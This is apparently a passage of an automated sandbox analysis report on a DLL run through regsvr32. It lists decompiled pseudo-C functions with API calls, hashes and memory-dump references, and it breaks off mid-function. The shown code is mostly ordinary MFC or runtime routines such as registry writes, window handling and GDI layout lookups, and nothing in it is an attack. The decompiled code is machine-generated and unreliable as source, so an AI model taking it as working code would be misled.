                                                                        • Instruction ID: cea5fa679d97d2953b6d76dc507eb4c5e7da3a0c11b163d723fb81d4da4a6e61
                                                                        • Opcode Fuzzy Hash: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
                                                                        • Instruction Fuzzy Hash: 7FF0A932500A306EE353A62B6D88F5E61D8DF81BD0FB20214F459E6192EB24AC8145A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10037A96 Relevance: 9.0, APIs: 6, Instructions: 47registrystringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E10037A96(void* _a4, char* _a8, char* _a12) {
				void* _t14;
				long _t18;
				signed int _t20;
				long _t25;

				if(_a12 != 0) {
					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {
						L6:
						_t14 = 0;
						L7:
						return _t14;
					}
					_t25 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);
					_t18 = RegCloseKey(_a4);
					if(_t18 != 0 || _t25 != 0) {
						goto L6;
					} else {
						_t14 = _t18 + 1;
						goto L7;
					}
				}
				_t20 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));
				asm("sbb eax, eax");
				return  ~_t20 + 1;
			}







                                                                        0x10037a9d
                                                                        0x10037ad8
                                                                        0x10037b0e
                                                                        0x10037b0e
                                                                        0x10037b10
                                                                        0x00000000
                                                                        0x10037b10
                                                                        0x10037afb
                                                                        0x10037afd
                                                                        0x10037b05
                                                                        0x00000000
                                                                        0x10037b0b
                                                                        0x10037b0b
                                                                        0x00000000
                                                                        0x10037b0b
                                                                        0x10037b05
                                                                        0x10037ab6
                                                                        0x10037abe
                                                                        0x00000000

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?), ref: 10037AA2
                                                                        • RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 10037AB6
                                                                        • RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 10037AD0
                                                                        • lstrlenA.KERNEL32(?), ref: 10037ADD
                                                                        • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 10037AF2
                                                                        • RegCloseKey.ADVAPI32(?), ref: 10037AFD
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Valuelstrlen$CloseCreate
                                                                        • String ID:
                                                                        • API String ID: 306239685-0
                                                                        • Opcode ID: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
                                                                        • Instruction ID: 36ac44db30e1571f4bd1a6b15574b4d5f9e82ccdf85d97020e0dea724d6fc6de
                                                                        • Opcode Fuzzy Hash: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
                                                                        • Instruction Fuzzy Hash: 4501043220016DFFEB235FA1DD48F9A7BA9FB08792F108410FE1AD9061D3718A60DB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10029C98 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 90%
                                                                        			E10029C98(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				struct HWND__* _t12;
				struct HWND__* _t21;

				ClientToScreen(_a4,  &_a8);
				_t12 = GetWindow(_a4, 5);
				while(1) {
					_t21 = _t12;
					if(_t21 == 0) {
						break;
					}
					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
						GetWindowRect(_t21,  &_v20);
						_push(_a12);
						if(PtInRect( &_v20, _a8) != 0) {
							return _t21;
						}
					}
					_t12 = GetWindow(_t21, 2);
				}
				return _t12;
			}






                                                                        0x10029ca7
                                                                        0x10029cf8
                                                                        0x10029cf8
                                                                        0x10029cfa
                                                                        0x10029cfe
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10029cc4
                                                                        0x10029cdb
                                                                        0x10029ce1
                                                                        0x10029cf3
                                                                        0x00000000
                                                                        0x10029d06
                                                                        0x10029cf3
                                                                        0x10029cf8
                                                                        0x10029cf8
                                                                        0x10029d03

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClientCtrlLongScreen
                                                                        • String ID:
                                                                        • API String ID: 1315500227-0
                                                                        • Opcode ID: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
                                                                        • Instruction ID: 9b9f6f1c131c314e5c19284c1e668e0a3a9e33f7fca6b6c160f9dd0f3207debf
                                                                        • Opcode Fuzzy Hash: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
                                                                        • Instruction Fuzzy Hash: 7A01623650056ABFDB129F569C48EEE37ADEF017D0F514115FD11EA161D730DA01DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10022233 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10022233(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				long _t34;
				long _t43;
				struct HWND__* _t48;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E1001F7AE();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x1c)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x1c)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x20)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x44));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x44)) = 0;
				}
				_t64 =  *(_t72 + 0x48);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x48) =  *(_t72 + 0x48) & 0x00000000;
				if(( *(_t72 + 0x38) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E100373DB() + 0x3c));
					if(_t71 != 0 &&  *(_t71 + 0x1c) != 0) {
						E10011C50( &_v52, 0, 0x30);
						_t48 =  *(_t72 + 0x1c);
						_v44 = _t48;
						_v40 = _t48;
						_v52 = 0x28;
						_v48 = 1;
						SendMessageA( *(_t71 + 0x1c), 0x405, 0,  &_v52);
					}
				}
				_t34 = GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc);
				E1002204B(_t72);
				if(GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc) == _t34) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x1c), 0xfffffffc, _t43);
					}
				}
				E10022168(_t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}















                                                                        0x1002223c
                                                                        0x10022243
                                                                        0x10022249
                                                                        0x1002224e
                                                                        0x10022273
                                                                        0x10022273
                                                                        0x10022279
                                                                        0x1002227b
                                                                        0x1002227b
                                                                        0x10022279
                                                                        0x1002227e
                                                                        0x10022283
                                                                        0x10022287
                                                                        0x1002228a
                                                                        0x1002228a
                                                                        0x1002228d
                                                                        0x10022295
                                                                        0x1002229a
                                                                        0x1002229a
                                                                        0x1002229d
                                                                        0x100222a4
                                                                        0x100222ab
                                                                        0x100222b0
                                                                        0x100222c0
                                                                        0x100222c5
                                                                        0x100222cb
                                                                        0x100222ce
                                                                        0x100222df
                                                                        0x100222e6
                                                                        0x100222e9
                                                                        0x100222e9
                                                                        0x100222b0
                                                                        0x100222fb
                                                                        0x10022301
                                                                        0x10022310
                                                                        0x1002231c
                                                                        0x10022320
                                                                        0x10022328
                                                                        0x10022328
                                                                        0x10022320
                                                                        0x10022330
                                                                        0x10022343

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: LongWindow$MessageSend
                                                                        • String ID: (
                                                                        • API String ID: 2178440468-3887548279
                                                                        • Opcode ID: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
                                                                        • Instruction ID: 74d92888995a03eb436cf4db0a6f1431d092ba1e50ceac8416b65ae125f9645e
                                                                        • Opcode Fuzzy Hash: a0256d8b5034a2fee01dc273fb99e3b5b93d09b5292866429bde14ed636a8408
                                                                        • Instruction Fuzzy Hash: 0C31AD34600615FFCB21DFA9E884A6EB7F8FF04250F52062DE5429B692CB31F848CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10032286 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10032286(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
				void* __ebp;
				void* _t29;
				int _t30;
				void* _t35;
				void* _t38;
				intOrPtr* _t40;
				int _t42;
				intOrPtr* _t45;
				void* _t46;

				_t45 = __ecx;
				_t29 = E10022AD5(__ecx);
				_t40 =  *((intOrPtr*)(_t45 + 0x7c));
				_t42 = _a4;
				_t38 = _t29;
				if(_t40 == 0) {
					L2:
					if(_a8 != 0xffff) {
						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
							 *(_t45 + 0xa4) =  *(_t45 + 0xa4) & 0x00000000;
							goto L17;
						} else {
							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
								if(_t42 < 0xff00) {
									goto L13;
								}
								 *(_t45 + 0xa4) = 0xef1f;
								goto L17;
							} else {
								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
								L13:
								 *(_t45 + 0xa4) = _t42;
								L17:
								 *(_t38 + 0x38) =  *(_t38 + 0x38) | 0x00000040;
								L18:
								_t30 =  *(_t45 + 0xa4);
								if(_t30 ==  *((intOrPtr*)(_t45 + 0xa8))) {
									L21:
									return _t30;
								}
								_t30 = E100220EE(_t46, GetParent( *(_t45 + 0x1c)));
								if(_t30 == 0) {
									goto L21;
								}
								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
							}
						}
					}
					 *(_t45 + 0x38) =  *(_t45 + 0x38) & 0xffffffbf;
					if( *((intOrPtr*)(_t38 + 0x64)) != 0) {
						 *(_t45 + 0xa4) = 0xe002;
					} else {
						 *(_t45 + 0xa4) = 0xe001;
					}
					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0xa4), 0);
					_t35 =  *((intOrPtr*)( *_t45 + 0x150))();
					if(_t35 != 0) {
						UpdateWindow( *(_t35 + 0x1c));
					}
					goto L18;
				}
				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
				if(_t30 != 0) {
					goto L21;
				}
				goto L2;
			}












                                                                        0x1003228c
                                                                        0x1003228e
                                                                        0x10032293
                                                                        0x10032298
                                                                        0x1003229b
                                                                        0x1003229d
                                                                        0x100322b3
                                                                        0x100322ba
                                                                        0x1003230d
                                                                        0x10032352
                                                                        0x00000000
                                                                        0x10032317
                                                                        0x1003231d
                                                                        0x10032344
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10032346
                                                                        0x00000000
                                                                        0x10032327
                                                                        0x10032330
                                                                        0x10032336
                                                                        0x10032336
                                                                        0x10032359
                                                                        0x10032359
                                                                        0x1003235d
                                                                        0x1003235d
                                                                        0x10032369
                                                                        0x10032394
                                                                        0x10032394
                                                                        0x10032394
                                                                        0x10032375
                                                                        0x1003237c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1003238a
                                                                        0x1003231d
                                                                        0x1003230d
                                                                        0x100322bc
                                                                        0x100322c4
                                                                        0x100322d2
                                                                        0x100322c6
                                                                        0x100322c6
                                                                        0x100322c6
                                                                        0x100322ec
                                                                        0x100322f6
                                                                        0x100322fe
                                                                        0x10032303
                                                                        0x10032303
                                                                        0x00000000
                                                                        0x100322fe
                                                                        0x100322a8
                                                                        0x100322ad
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Message$ParentPostSendUpdateWindow
                                                                        • String ID: @
                                                                        • API String ID: 4141989945-2766056989
                                                                        • Opcode ID: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
                                                                        • Instruction ID: 6191196fd6615e40dc101e77c52f198469b7c7f61996bf1ea28baad2e91494f1
                                                                        • Opcode Fuzzy Hash: bad5658601269fb567b95f36ded4ee85d4dfb2814405908c13ec14e44f39eb87
                                                                        • Instruction Fuzzy Hash: 8D319635601B05EFEB22CF21CD48B5A77E5FF41352F258828E65A9E1A1C7B9A980DB01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10034CE3 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E10034CE3(void* __ecx, void* __eflags) {
				intOrPtr _t18;
				intOrPtr* _t20;
				intOrPtr _t26;
				void* _t33;
				void* _t35;

				E10011BF0(0x1003a3fc, _t35);
				_push(__ecx);
				_t33 = __ecx;
				 *((intOrPtr*)(_t35 - 0x10)) = 0;
				E10034BFF(__ecx, 0x20, _t35 - 0x10);
				if( *((intOrPtr*)(_t35 + 8)) != 0 &&  *((intOrPtr*)(_t35 - 0x10)) == 0) {
					_t26 = E1001F77E(0x20);
					 *((intOrPtr*)(_t35 - 0x10)) = _t26;
					_t41 = _t26;
					 *(_t35 - 4) = 0;
					if(_t26 == 0) {
						_t20 = 0;
						__eflags = 0;
					} else {
						_push(0x1e);
						_push( *((intOrPtr*)(_t35 + 8)));
						_push("File%d");
						_push("Recent File List");
						_push(0);
						_t20 = E10024F0F(_t26, _t41);
					}
					 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x84)) = _t20;
					 *((intOrPtr*)( *_t20 + 0x10))();
				}
				_t18 = E1003599F(_t33, "Settings", "PreviewPages", 0);
				 *((intOrPtr*)(_t33 + 0x90)) = _t18;
				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
				return _t18;
			}








                                                                        0x10034ce8
                                                                        0x10034ced
                                                                        0x10034cf8
                                                                        0x10034cfa
                                                                        0x10034cfd
                                                                        0x10034d05
                                                                        0x10034d14
                                                                        0x10034d16
                                                                        0x10034d19
                                                                        0x10034d1b
                                                                        0x10034d1e
                                                                        0x10034d37
                                                                        0x10034d37
                                                                        0x10034d20
                                                                        0x10034d20
                                                                        0x10034d22
                                                                        0x10034d25
                                                                        0x10034d2a
                                                                        0x10034d2f
                                                                        0x10034d30
                                                                        0x10034d30
                                                                        0x10034d39
                                                                        0x10034d3d
                                                                        0x10034d47
                                                                        0x10034d47
                                                                        0x10034d57
                                                                        0x10034d5f
                                                                        0x10034d67
                                                                        0x10034d6f

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10034CE8
                                                                          • Part of subcall function 10024F0F: __EH_prolog.LIBCMT ref: 10024F14
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: H_prolog
                                                                        • String ID: File%d$PreviewPages$Recent File List$Settings
                                                                        • API String ID: 3519838083-526586445
                                                                        • Opcode ID: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
                                                                        • Instruction ID: 492fd1891bf7533495f0361d30171d8b100ab146b8dd749383e38376895f11d0
                                                                        • Opcode Fuzzy Hash: 932e69f2a25fdaf2d1d7247067e9866bd34830d2efb07ad355ada0066ba91e73
                                                                        • Instruction Fuzzy Hash: FA01B579A00605AFCB16EF649C05BEEBAB5FB84712F11861FF1569F281DF70A5408750
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10028BC6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E10028BC6(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}







                                                                        0x10028bcd
                                                                        0x10028bcf
                                                                        0x10028bdb
                                                                        0x10028bdd
                                                                        0x10028be5
                                                                        0x10028bf8
                                                                        0x10028bfc
                                                                        0x10028bff
                                                                        0x10028bff
                                                                        0x10028be7
                                                                        0x10028bf0
                                                                        0x10028bf0
                                                                        0x10028c09

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
                                                                        • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
                                                                        • SetLastError.KERNEL32(00000078,?,?,10030BC6,00000000), ref: 10028BFF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressErrorHandleLastModuleProc
                                                                        • String ID: GDI32.DLL$SetLayout
                                                                        • API String ID: 4275029093-2147214759
                                                                        • Opcode ID: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
                                                                        • Instruction ID: de10e2654153e74bad07dc63c5cb2a97a5a293e8e121725d640a5f2c86b9b1e6
                                                                        • Opcode Fuzzy Hash: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
                                                                        • Instruction Fuzzy Hash: 1AE02077105110BFD253875A9C48C5F7B62D7C4372B11C619F276D5090CB3188018721
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10028B90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E10028B90(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}






                                                                        0x10028b96
                                                                        0x10028ba4
                                                                        0x10028bac
                                                                        0x10028bb9
                                                                        0x10028bbc
                                                                        0x10028bae
                                                                        0x10028bb3
                                                                        0x10028bb3
                                                                        0x10028bc5

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
                                                                        • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
                                                                        • SetLastError.KERNEL32(00000078), ref: 10028BBC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressErrorHandleLastModuleProc
                                                                        • String ID: GDI32.DLL$GetLayout
                                                                        • API String ID: 4275029093-2396518106
                                                                        • Opcode ID: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
                                                                        • Instruction ID: 54bc3d33d325d2134ddbcfb4761d493361e18e0aa1f1c781400aef32ec3f8dd9
                                                                        • Opcode Fuzzy Hash: 8afe1690608ce82dbca3926b0a057167ce80ddde095d094937dead2d2ff1ddbb
                                                                        • Instruction Fuzzy Hash: BBD05EB6A052346FDAA35BF5AC4CE5A7A54DB047B2B418669FD65EA1E0CB24CC008790
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10011DCF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 68%
                                                                        			E10011DCF(int _a4) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;

				_t3 = GetModuleHandleA("mscoree.dll");
				if(_t3 != 0) {
					_t4 = GetProcAddress(_t3, "CorExitProcess");
					if(_t4 != 0) {
						 *_t4(_a4);
					}
				}
				ExitProcess(_a4);
			}





                                                                        0x10011dd4
                                                                        0x10011ddc
                                                                        0x10011de4
                                                                        0x10011dec
                                                                        0x10011df2
                                                                        0x10011df2
                                                                        0x10011dec
                                                                        0x10011df8

                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(mscoree.dll,10011F3D,?,10041DB0,00000008,10011F63,?,00000001,00000000,10016CF1,00000003), ref: 10011DD4
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10011DE4
                                                                        • ExitProcess.KERNEL32 ref: 10011DF8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressExitHandleModuleProcProcess
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 75539706-1276376045
                                                                        • Opcode ID: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
                                                                        • Instruction ID: 44dc424d0b29a2a163b933457fd361873f6b0f507bf76f9d722852a62850aa7a
                                                                        • Opcode Fuzzy Hash: 3fc20c7666ee96b06c5226d441d543eb9b5fbec8a0200ca7e01eb325b998744c
                                                                        • Instruction Fuzzy Hash: F2D0C9B0604217AFEA429BB2CD48DEB3AA8EF406857108428F416D8021CF31CD019B11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10018BEF Relevance: 7.7, APIs: 5, Instructions: 216COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 78%
                                                                        			E10018BEF(intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __edi;
				void* __ebp;
				intOrPtr* _t89;
				void* _t90;
				void* _t101;
				intOrPtr _t112;
				void* _t115;
				signed int _t120;
				signed int _t125;
				intOrPtr _t132;
				intOrPtr _t133;
				void* _t138;
				intOrPtr _t140;
				signed int _t142;
				signed int _t143;
				signed int _t146;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				signed int _t152;
				void* _t159;
				intOrPtr _t162;
				signed int _t164;
				signed int _t165;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t172;
				intOrPtr* _t173;
				intOrPtr _t174;
				void* _t176;
				intOrPtr _t180;

				_t89 = _a4;
				_v12 = _v12 & 0x00000000;
				_t133 =  *((intOrPtr*)(_t89 + 4));
				_t162 =  *_t89;
				_v24 = _t162;
				_v20 = _t133;
				_t90 = E1001519D(_t162);
				_t174 = _t133;
				_t172 = _t90;
				if(_t174 < 0 || _t174 <= 0 && _t162 < 0) {
					L28:
					return 0;
				} else {
					_t176 = _t133 - 0x1000;
					if(_t176 > 0 || _t176 >= 0 && _t162 > 0) {
						goto L28;
					} else {
						if( *((intOrPtr*)(_t172 + 0x44)) != 0) {
							L9:
							_t173 =  *((intOrPtr*)(_t172 + 0x44));
							L10:
							_t142 = E10013780(_t162, _t133, 0x1e13380, 0) + 0x46;
							_t10 = _t142 + 0x12b; // 0xe5
							asm("cdq");
